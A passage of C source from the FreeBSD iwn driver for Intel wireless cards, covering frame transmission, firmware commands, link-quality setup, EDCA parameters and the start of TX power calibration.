IEEE80211_QOS_ACKPOLICY) != IEEE80211_QOS_ACKPOLICY_NOACK) flags |= IWN_TX_NEED_ACK; } if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_CTL | IEEE80211_FC0_SUBTYPE_BAR)) flags |= IWN_TX_IMM_BA; /* Cannot happen yet. */ if (wh->i_fc[1] & IEEE80211_FC1_MORE_FRAG) flags |= IWN_TX_MORE_FRAG; /* Cannot happen yet. */ /* Check if frame must be protected using RTS/CTS or CTS-to-self. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { /* NB: Group frames are sent using CCK in 802.11b/g. */ if (totlen + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) { flags |= IWN_TX_NEED_RTS; } else if (iwn_check_rate_needs_protection(sc, vap, rate)) { if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) flags |= IWN_TX_NEED_CTS; else if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) flags |= IWN_TX_NEED_RTS; } /* XXX HT protection? */ if (flags & (IWN_TX_NEED_RTS | IWN_TX_NEED_CTS)) { if (sc->hw_type != IWN_HW_REV_TYPE_4965) { /* 5000 autoselects RTS/CTS or CTS-to-self. */ flags &= ~(IWN_TX_NEED_RTS | IWN_TX_NEED_CTS); flags |= IWN_TX_NEED_PROTECTION; } else flags |= IWN_TX_FULL_TXOP; } } if (IEEE80211_IS_MULTICAST(wh->i_addr1) || type != IEEE80211_FC0_TYPE_DATA) tx->id = sc->broadcast_id; else tx->id = wn->id; if (type == IEEE80211_FC0_TYPE_MGT) { uint8_t subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* Tell HW to set timestamp in probe responses. */ if (subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) flags |= IWN_TX_INSERT_TSTAMP; if (subtype == IEEE80211_FC0_SUBTYPE_ASSOC_REQ || subtype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) tx->timeout = htole16(3); else tx->timeout = htole16(2); } else tx->timeout = htole16(0); if (hdrlen & 3) { /* First segment length must be a multiple of 4. */ flags |= IWN_TX_NEED_PADDING; pad = 4 - (hdrlen & 3); } else pad = 0; tx->len = htole16(totlen); tx->tid = tid; tx->rts_ntries = 60; tx->data_ntries = 15; tx->lifetime = htole32(IWN_LIFETIME_INFINITE); tx->rate = iwn_rate_to_plcp(sc, ni, rate); if (tx->id == sc->broadcast_id) { /* Group or management frame. */ tx->linkq = 0; } else { tx->linkq = iwn_tx_rate_to_linkq_offset(sc, ni, rate); flags |= IWN_TX_LINKQ; /* enable MRR */ } /* Set physical address of "scratch area". */ tx->loaddr = htole32(IWN_LOADDR(data->scratch_paddr)); tx->hiaddr = IWN_HIADDR(data->scratch_paddr); /* Copy 802.11 header in TX command. */ memcpy((uint8_t *)(tx + 1), wh, hdrlen); /* Trim 802.11 header. */ m_adj(m, hdrlen); tx->security = 0; tx->flags = htole32(flags); error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { if (error != EFBIG) { device_printf(sc->sc_dev, "%s: can't map mbuf (error %d)\n", __func__, error); m_freem(m); return error; } /* Too many DMA segments, linearize mbuf. */ m1 = m_collapse(m, M_NOWAIT, IWN_MAX_SCATTER); if (m1 == NULL) { device_printf(sc->sc_dev, "%s: could not defrag mbuf\n", __func__); m_freem(m); return ENOBUFS; } m = m1; error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "%s: can't map mbuf (error %d)\n", __func__, error); m_freem(m); return error; } } data->m = m; data->ni = ni; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: qid %d idx %d len %d nsegs %d rate %04x plcp 0x%08x\n", __func__, ring->qid, ring->cur, m->m_pkthdr.len, nsegs, rate, tx->rate); /* Fill TX descriptor. */ desc->nsegs = 1; if (m->m_len != 0) desc->nsegs += nsegs; /* First DMA segment is used by the TX command. */ desc->segs[0].addr = htole32(IWN_LOADDR(data->cmd_paddr)); desc->segs[0].len = htole16(IWN_HIADDR(data->cmd_paddr) | (4 + sizeof (*tx) + hdrlen + pad) << 4); /* Other DMA segments are for data payload. */ seg = &segs[0]; for (i = 1; i <= nsegs; i++) { desc->segs[i].addr = htole32(IWN_LOADDR(seg->ds_addr)); desc->segs[i].len = htole16(IWN_HIADDR(seg->ds_addr) | seg->ds_len << 4); seg++; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->data_dmat, ring->cmd_dma.map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); /* Update TX scheduler. */ if (ring->qid >= sc->firstaggqueue) ops->update_sched(sc, ring->qid, ring->cur, tx->id, totlen); /* Kick TX ring. */ ring->cur = (ring->cur + 1) % IWN_TX_RING_COUNT; IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, ring->qid << 8 | ring->cur); /* Mark TX ring as full if we reach a certain threshold. */ if (++ring->queued > IWN_TX_RING_HIMARK) sc->qfullmsk |= 1 << ring->qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } static int iwn_tx_data_raw(struct iwn_softc *sc, struct mbuf *m, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct iwn_ops *ops = &sc->ops; // struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap = ni->ni_vap; // struct ieee80211com *ic = ifp->if_l2com; struct iwn_tx_cmd *cmd; struct iwn_cmd_data *tx; struct ieee80211_frame *wh; struct iwn_tx_ring *ring; struct iwn_tx_desc *desc; struct iwn_tx_data *data; struct mbuf *m1; bus_dma_segment_t *seg, segs[IWN_MAX_SCATTER]; uint32_t flags; u_int hdrlen; int ac, totlen, error, pad, nsegs = 0, i, rate; uint8_t type; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); IWN_LOCK_ASSERT(sc); wh = mtod(m, struct ieee80211_frame *); hdrlen = ieee80211_anyhdrsize(wh); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; ac = params->ibp_pri & 3; ring = &sc->txq[ac]; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; /* Choose a TX rate. */ rate = params->ibp_rate0; totlen = m->m_pkthdr.len; /* Prepare TX firmware command. */ cmd = &ring->cmd[ring->cur]; cmd->code = IWN_CMD_TX_DATA; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; tx = (struct iwn_cmd_data *)cmd->data; /* NB: No need to clear tx, all fields are reinitialized here. */ tx->scratch = 0; /* clear "scratch" area */ flags = 0; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) flags |= IWN_TX_NEED_ACK; if (params->ibp_flags & IEEE80211_BPF_RTS) { if (sc->hw_type != IWN_HW_REV_TYPE_4965) { /* 5000 autoselects RTS/CTS or CTS-to-self. */ flags &= ~IWN_TX_NEED_RTS; flags |= IWN_TX_NEED_PROTECTION; } else flags |= IWN_TX_NEED_RTS | IWN_TX_FULL_TXOP; } if (params->ibp_flags & IEEE80211_BPF_CTS) { if (sc->hw_type != IWN_HW_REV_TYPE_4965) { /* 5000 autoselects RTS/CTS or CTS-to-self. */ flags &= ~IWN_TX_NEED_CTS; flags |= IWN_TX_NEED_PROTECTION; } else flags |= IWN_TX_NEED_CTS | IWN_TX_FULL_TXOP; } if (type == IEEE80211_FC0_TYPE_MGT) { uint8_t subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* Tell HW to set timestamp in probe responses. */ if (subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) flags |= IWN_TX_INSERT_TSTAMP; if (subtype == IEEE80211_FC0_SUBTYPE_ASSOC_REQ || subtype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) tx->timeout = htole16(3); else tx->timeout = htole16(2); } else tx->timeout = htole16(0); if (hdrlen & 3) { /* First segment length must be a multiple of 4. */ flags |= IWN_TX_NEED_PADDING; pad = 4 - (hdrlen & 3); } else pad = 0; if (ieee80211_radiotap_active_vap(vap)) { struct iwn_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; ieee80211_radiotap_tx(vap, m); } tx->len = htole16(totlen); tx->tid = 0; tx->id = sc->broadcast_id; tx->rts_ntries = params->ibp_try1; tx->data_ntries = params->ibp_try0; tx->lifetime = htole32(IWN_LIFETIME_INFINITE); tx->rate = iwn_rate_to_plcp(sc, ni, rate); /* Group or management frame. */ tx->linkq = 0; /* Set physical address of "scratch area". */ tx->loaddr = htole32(IWN_LOADDR(data->scratch_paddr)); tx->hiaddr = IWN_HIADDR(data->scratch_paddr); /* Copy 802.11 header in TX command. */ memcpy((uint8_t *)(tx + 1), wh, hdrlen); /* Trim 802.11 header. */ m_adj(m, hdrlen); tx->security = 0; tx->flags = htole32(flags); error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { if (error != EFBIG) { device_printf(sc->sc_dev, "%s: can't map mbuf (error %d)\n", __func__, error); m_freem(m); return error; } /* Too many DMA segments, linearize mbuf. */ m1 = m_collapse(m, M_NOWAIT, IWN_MAX_SCATTER); if (m1 == NULL) { device_printf(sc->sc_dev, "%s: could not defrag mbuf\n", __func__); m_freem(m); return ENOBUFS; } m = m1; error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "%s: can't map mbuf (error %d)\n", __func__, error); m_freem(m); return error; } } data->m = m; data->ni = ni; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: qid %d idx %d len %d nsegs %d\n", __func__, ring->qid, ring->cur, m->m_pkthdr.len, nsegs); /* Fill TX descriptor. */ desc->nsegs = 1; if (m->m_len != 0) desc->nsegs += nsegs; /* First DMA segment is used by the TX command. */ desc->segs[0].addr = htole32(IWN_LOADDR(data->cmd_paddr)); desc->segs[0].len = htole16(IWN_HIADDR(data->cmd_paddr) | (4 + sizeof (*tx) + hdrlen + pad) << 4); /* Other DMA segments are for data payload. */ seg = &segs[0]; for (i = 1; i <= nsegs; i++) { desc->segs[i].addr = htole32(IWN_LOADDR(seg->ds_addr)); desc->segs[i].len = htole16(IWN_HIADDR(seg->ds_addr) | seg->ds_len << 4); seg++; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->data_dmat, ring->cmd_dma.map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); /* Update TX scheduler. */ if (ring->qid >= sc->firstaggqueue) ops->update_sched(sc, ring->qid, ring->cur, tx->id, totlen); /* Kick TX ring. */ ring->cur = (ring->cur + 1) % IWN_TX_RING_COUNT; IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, ring->qid << 8 | ring->cur); /* Mark TX ring as full if we reach a certain threshold. */ if (++ring->queued > IWN_TX_RING_HIMARK) sc->qfullmsk |= 1 << ring->qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } static int iwn_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct iwn_softc *sc = ifp->if_softc; int error = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { ieee80211_free_node(ni); m_freem(m); return ENETDOWN; } IWN_LOCK(sc); if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ error = iwn_tx_data(sc, m, ni); } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ error = iwn_tx_data_raw(sc, m, ni, params); } if (error != 0) { /* NB: m is reclaimed on tx failure */ ieee80211_free_node(ni); ifp->if_oerrors++; } sc->sc_tx_timer = 5; IWN_UNLOCK(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return error; } static void iwn_start(struct ifnet *ifp) { struct iwn_softc *sc = ifp->if_softc; IWN_LOCK(sc); iwn_start_locked(ifp); IWN_UNLOCK(sc); } static void iwn_start_locked(struct ifnet *ifp) { struct iwn_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; IWN_LOCK_ASSERT(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || (ifp->if_drv_flags & IFF_DRV_OACTIVE)) return; for (;;) { if (sc->qfullmsk != 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; if (iwn_tx_data(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; continue; } sc->sc_tx_timer = 5; } } static void iwn_watchdog(void *arg) { struct iwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IWN_LOCK_ASSERT(sc); KASSERT(ifp->if_drv_flags & IFF_DRV_RUNNING, ("not running")); DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); ieee80211_runtask(ic, &sc->sc_reinit_task); return; } } callout_reset(&sc->watchdog_to, hz, iwn_watchdog, sc); } static int iwn_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct iwn_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0, stop = 0; switch (cmd) { case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; case SIOCSIFFLAGS: IWN_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { iwn_init_locked(sc); if (IWN_READ(sc, IWN_GP_CNTRL) & IWN_GP_CNTRL_RFKILL) startall = 1; else stop = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) iwn_stop_locked(sc); } IWN_UNLOCK(sc); if (startall) ieee80211_start_all(ic); else if (vap != NULL && stop) ieee80211_stop(vap); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; default: error = EINVAL; break; } return error; } /* * Send a command to the firmware. */ static int iwn_cmd(struct iwn_softc *sc, int code, const void *buf, int size, int async) { struct iwn_tx_ring *ring; struct iwn_tx_desc *desc; struct iwn_tx_data *data; struct iwn_tx_cmd *cmd; struct mbuf *m; bus_addr_t paddr; int totlen, error; int cmd_queue_num; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if (async == 0) IWN_LOCK_ASSERT(sc); if (sc->sc_flags & IWN_FLAG_PAN_SUPPORT) cmd_queue_num = IWN_PAN_CMD_QUEUE; else cmd_queue_num = IWN_CMD_QUEUE_NUM; ring = &sc->txq[cmd_queue_num]; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; totlen = 4 + size; if (size > sizeof cmd->data) { /* Command is too large to fit in a descriptor. */ if (totlen > MCLBYTES) return EINVAL; m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE); if (m == NULL) return ENOMEM; cmd = mtod(m, struct iwn_tx_cmd *); error = bus_dmamap_load(ring->data_dmat, data->map, cmd, totlen, iwn_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0) { m_freem(m); return error; } data->m = m; } else { cmd = &ring->cmd[ring->cur]; paddr = data->cmd_paddr; } cmd->code = code; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; memcpy(cmd->data, buf, size); desc->nsegs = 1; desc->segs[0].addr = htole32(IWN_LOADDR(paddr)); desc->segs[0].len = htole16(IWN_HIADDR(paddr) | totlen << 4); DPRINTF(sc, IWN_DEBUG_CMD, "%s: %s (0x%x) flags %d qid %d idx %d\n", __func__, iwn_intr_str(cmd->code), cmd->code, cmd->flags, cmd->qid, cmd->idx); if (size > sizeof cmd->data) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); } else { bus_dmamap_sync(ring->data_dmat, ring->cmd_dma.map, BUS_DMASYNC_PREWRITE); } bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); /* Kick command ring. */ ring->cur = (ring->cur + 1) % IWN_TX_RING_COUNT; IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, ring->qid << 8 | ring->cur); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return async ? 0 : msleep(desc, &sc->sc_mtx, PCATCH, "iwncmd", hz); } static int iwn4965_add_node(struct iwn_softc *sc, struct iwn_node_info *node, int async) { struct iwn4965_node_info hnode; caddr_t src, dst; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* * We use the node structure for 5000 Series internally (it is * a superset of the one for 4965AGN). We thus copy the common * fields before sending the command. */ src = (caddr_t)node; dst = (caddr_t)&hnode; memcpy(dst, src, 48); /* Skip TSC, RX MIC and TX MIC fields from ``src''. */ memcpy(dst + 48, src + 72, 20); return iwn_cmd(sc, IWN_CMD_ADD_NODE, &hnode, sizeof hnode, async); } static int iwn5000_add_node(struct iwn_softc *sc, struct iwn_node_info *node, int async) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Direct mapping. */ return iwn_cmd(sc, IWN_CMD_ADD_NODE, node, sizeof (*node), async); } static int iwn_set_link_quality(struct iwn_softc *sc, struct ieee80211_node *ni) { #define RV(v) ((v) & IEEE80211_RATE_VAL) struct iwn_node *wn = (void *)ni; struct ieee80211_rateset *rs; struct iwn_cmd_link_quality linkq; uint8_t txant; int i, rate, txrate; int is_11n; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Use the first valid TX antenna. */ txant = IWN_LSB(sc->txchainmask); memset(&linkq, 0, sizeof linkq); linkq.id = wn->id; linkq.antmsk_1stream = txant; /* * The '2 stream' setup is a bit .. odd. * * For NICs that support only 1 antenna, default to IWN_ANT_AB or * the firmware panics (eg Intel 5100.) * * For NICs that support two antennas, we use ANT_AB. * * For NICs that support three antennas, we use the two that * wasn't the default one. * * XXX TODO: if bluetooth (full concurrent) is enabled, restrict * this to only one antenna. */ /* So - if there's no secondary antenna, assume IWN_ANT_AB */ /* Default - transmit on the other antennas */ linkq.antmsk_2stream = (sc->txchainmask & ~IWN_LSB(sc->txchainmask)); /* Now, if it's zero, set it to IWN_ANT_AB, so to not panic firmware */ if (linkq.antmsk_2stream == 0) linkq.antmsk_2stream = IWN_ANT_AB; /* * If the NIC is a two-stream TX NIC, configure the TX mask to * the default chainmask */ else if (sc->ntxchains == 2) linkq.antmsk_2stream = sc->txchainmask; linkq.ampdu_max = 32; /* XXX negotiated? */ linkq.ampdu_threshold = 3; linkq.ampdu_limit = htole16(4000); /* 4ms */ DPRINTF(sc, IWN_DEBUG_XMIT, "%s: 1stream antenna=0x%02x, 2stream antenna=0x%02x, ntxstreams=%d\n", __func__, linkq.antmsk_1stream, linkq.antmsk_2stream, sc->ntxchains); /* * Are we using 11n rates? Ensure the channel is * 11n _and_ we have some 11n rates, or don't * try. */ if (IEEE80211_IS_CHAN_HT(ni->ni_chan) && ni->ni_htrates.rs_nrates > 0) { rs = (struct ieee80211_rateset *) &ni->ni_htrates; is_11n = 1; } else { rs = &ni->ni_rates; is_11n = 0; } /* Start at highest available bit-rate. */ /* * XXX this is all very dirty! */ if (is_11n) txrate = ni->ni_htrates.rs_nrates - 1; else txrate = rs->rs_nrates - 1; for (i = 0; i < IWN_MAX_TX_RETRIES; i++) { uint32_t plcp; if (is_11n) rate = IEEE80211_RATE_MCS | rs->rs_rates[txrate]; else rate = RV(rs->rs_rates[txrate]); DPRINTF(sc, IWN_DEBUG_XMIT, "%s: i=%d, txrate=%d, rate=0x%02x\n", __func__, i, txrate, rate); /* Do rate -> PLCP config mapping */ plcp = iwn_rate_to_plcp(sc, ni, rate); linkq.retry[i] = plcp; /* * The mimo field is an index into the table which * indicates the first index where it and subsequent entries * will not be using MIMO. * * Since we're filling linkq from 0..15 and we're filling * from the higest MCS rates to the lowest rates, if we * _are_ doing a dual-stream rate, set mimo to idx+1 (ie, * the next entry.) That way if the next entry is a non-MIMO * entry, we're already pointing at it. */ if ((le32toh(plcp) & IWN_RFLAG_MCS) && RV(le32toh(plcp)) > 7) linkq.mimo = i + 1; /* Next retry at immediate lower bit-rate. */ if (txrate > 0) txrate--; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return iwn_cmd(sc, IWN_CMD_LINK_QUALITY, &linkq, sizeof linkq, 1); #undef RV } /* * Broadcast node is used to send group-addressed and management frames. */ static int iwn_add_broadcast_node(struct iwn_softc *sc, int async) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwn_node_info node; struct iwn_cmd_link_quality linkq; uint8_t txant; int i, error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.macaddr, ifp->if_broadcastaddr); node.id = sc->broadcast_id; DPRINTF(sc, IWN_DEBUG_RESET, "%s: adding broadcast node\n", __func__); if ((error = ops->add_node(sc, &node, async)) != 0) return error; /* Use the first valid TX antenna. */ txant = IWN_LSB(sc->txchainmask); memset(&linkq, 0, sizeof linkq); linkq.id = sc->broadcast_id; linkq.antmsk_1stream = txant; linkq.antmsk_2stream = IWN_ANT_AB; linkq.ampdu_max = 64; linkq.ampdu_threshold = 3; linkq.ampdu_limit = htole16(4000); /* 4ms */ /* Use lowest mandatory bit-rate. */ if (IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) linkq.retry[0] = htole32(0xd); else linkq.retry[0] = htole32(10 | IWN_RFLAG_CCK); linkq.retry[0] |= htole32(IWN_RFLAG_ANT(txant)); /* Use same bit-rate for all TX retries. */ for (i = 1; i < IWN_MAX_TX_RETRIES; i++) { linkq.retry[i] = linkq.retry[0]; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return iwn_cmd(sc, IWN_CMD_LINK_QUALITY, &linkq, sizeof linkq, async); } static int iwn_updateedca(struct ieee80211com *ic) { #define IWN_EXP2(x) ((1 << (x)) - 1) /* CWmin = 2^ECWmin - 1 */ struct iwn_softc *sc = ic->ic_ifp->if_softc; struct iwn_edca_params cmd; int aci; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); memset(&cmd, 0, sizeof cmd); cmd.flags = htole32(IWN_EDCA_UPDATE); for (aci = 0; aci < WME_NUM_AC; aci++) { const struct wmeParams *ac = &ic->ic_wme.wme_chanParams.cap_wmeParams[aci]; cmd.ac[aci].aifsn = ac->wmep_aifsn; cmd.ac[aci].cwmin = htole16(IWN_EXP2(ac->wmep_logcwmin)); cmd.ac[aci].cwmax = htole16(IWN_EXP2(ac->wmep_logcwmax)); cmd.ac[aci].txoplimit = htole16(IEEE80211_TXOP_TO_US(ac->wmep_txopLimit)); } IEEE80211_UNLOCK(ic); IWN_LOCK(sc); (void)iwn_cmd(sc, IWN_CMD_EDCA_PARAMS, &cmd, sizeof cmd, 1); IWN_UNLOCK(sc); IEEE80211_LOCK(ic); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; #undef IWN_EXP2 } static void iwn_update_mcast(struct ifnet *ifp) { /* Ignore */ } static void iwn_set_led(struct iwn_softc *sc, uint8_t which, uint8_t off, uint8_t on) { struct iwn_cmd_led led; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); #if 0 /* XXX don't set LEDs during scan? */ if (sc->sc_is_scanning) return; #endif /* Clear microcode LED ownership. */ IWN_CLRBITS(sc, IWN_LED, IWN_LED_BSM_CTRL); led.which = which; led.unit = htole32(10000); /* on/off in unit of 100ms */ led.off = off; led.on = on; (void)iwn_cmd(sc, IWN_CMD_SET_LED, &led, sizeof led, 1); } /* * Set the critical temperature at which the firmware will stop the radio * and notify us. */ static int iwn_set_critical_temp(struct iwn_softc *sc) { struct iwn_critical_temp crit; int32_t temp; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_CTEMP_STOP_RF); if (sc->hw_type == IWN_HW_REV_TYPE_5150) temp = (IWN_CTOK(110) - sc->temp_off) * -5; else if (sc->hw_type == IWN_HW_REV_TYPE_4965) temp = IWN_CTOK(110); else temp = 110; memset(&crit, 0, sizeof crit); crit.tempR = htole32(temp); DPRINTF(sc, IWN_DEBUG_RESET, "setting critical temp to %d\n", temp); return iwn_cmd(sc, IWN_CMD_SET_CRITICAL_TEMP, &crit, sizeof crit, 0); } static int iwn_set_timing(struct iwn_softc *sc, struct ieee80211_node *ni) { struct iwn_cmd_timing cmd; uint64_t val, mod; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); memset(&cmd, 0, sizeof cmd); memcpy(&cmd.tstamp, ni->ni_tstamp.data, sizeof (uint64_t)); cmd.bintval = htole16(ni->ni_intval); cmd.lintval = htole16(10); /* Compute remaining time until next beacon. */ val = (uint64_t)ni->ni_intval * IEEE80211_DUR_TU; mod = le64toh(cmd.tstamp) % val; cmd.binitval = htole32((uint32_t)(val - mod)); DPRINTF(sc, IWN_DEBUG_RESET, "timing bintval=%u tstamp=%ju, init=%u\n", ni->ni_intval, le64toh(cmd.tstamp), (uint32_t)(val - mod)); return iwn_cmd(sc, IWN_CMD_TIMING, &cmd, sizeof cmd, 1); } static void iwn4965_power_calibration(struct iwn_softc *sc, int temp) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Adjust TX power if need be (delta >= 3 degC). */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: temperature %d->%d\n", __func__, sc->temp, temp); if (abs(temp - sc->temp) >= 3) { /* Record temperature of last calibration. */ sc->temp = temp; (void)iwn4965_set_txpower(sc, ic->ic_bsschan, 1); } } /* * Set TX power for current channel (each rate has its own power settings). * This function takes into account the regulatory information from EEPROM, * the current temperature and the current voltage. */ static int iwn4965_set_txpower(struct iwn_softc *sc, struct ieee80211_channel *ch, int async) { /* Fixed-point arithmetic division using a n-bit fractional part. */ #define fdivround(a, b, n) \ ((((1 << n) * (a)) / (b) + (1 << n) / 2) / (1 << n)) /* Linear interpolation. */ #define interpolate(x, x1, y1, x2, y2, n) \ ((y1) + fdivround(((int)(x) - (x1)) * ((y2) - (y1)), (x2) - (x1), n)) static const int tdiv[IWN_NATTEN_GROUPS] = { 9, 8, 8, 8, 6 }; struct iwn_ucode_info *uc = &sc->ucode_info; struct iwn4965_cmd_txpower cmd; struct iwn4965_eeprom_chan_samples *chans; const uint8_t *rf_gain, *dsp_gain; int32_t vdiff, tdiff; int i, c, grp, maxpwr; uint8_t chan; sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; /* Retrieve current channel from last RXON. */ chan = sc->rxon->chan; DPRINTF(sc, IWN_DEBUG_RESET, "setting TX power for channel %d\n", chan); memset(&cmd, 0, sizeof cmd); cmd.band = IEEE80211_IS_CHAN_5GHZ(ch) ? 0 : 1; cmd.chan = chan; if (IEEE80211_IS_CHAN_5GHZ(ch)) { maxpwr = sc->maxpwr5GHz; rf_gain = iwn4965_rf_gain_5ghz; dsp_gain = iwn4965_dsp_gain_5ghz; } else { maxpwr = sc->maxpwr2GHz; rf_gain = iwn4965_rf_gain_2ghz; dsp_gain = iwn4965_dsp_gain_2ghz; } /* Compute voltage compensation. */ vdiff = ((int32_t)le32toh(uc->volt) - sc->eeprom_voltage) / 7; if (vdiff > 0) vdiff *= 2; if (abs(vdiff) > 2) vdiff = 0; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: voltage compensation=%d (UCODE=%d, EEPROM=%d)\n", __func__, vdiff, le32toh(uc->volt), sc->eeprom_voltage); /* Get channel attenuation group. */ if (chan <= 20) /* 1-20 */ grp = 4; else if (chan <= 43) /* 34-43 */ grp = 0; else if (chan <= 70) /* 44-70 */ grp = 1; else if (chan <= 124) /* 71-124 */ grp = 2; else /* 125-200 */ grp = 3; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: chan %d, attenuation group=%d\n", __func__, chan, grp); /* Get channel sub-band. */ for (i = 0; i < IWN_NBANDS; i++) if (sc->bands[i].lo != 0 && sc->bands[i].lo <= chan && chan <= sc->bands[i].hi) break; if (i == IWN_NBANDS) /* Can't happen in real-life. */ return EINVAL; chans = sc->bands[i].chans; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: chan %d sub-band=%d\n", __func__, chan, i); for (c = 0; c < 2; c++) { uint8_t power, gain, temp; int maxchpwr, pwr, ridx, idx; power = interpolate(chan, chans[0].num, chans[0].samples[c][1].power, chans[1].num, 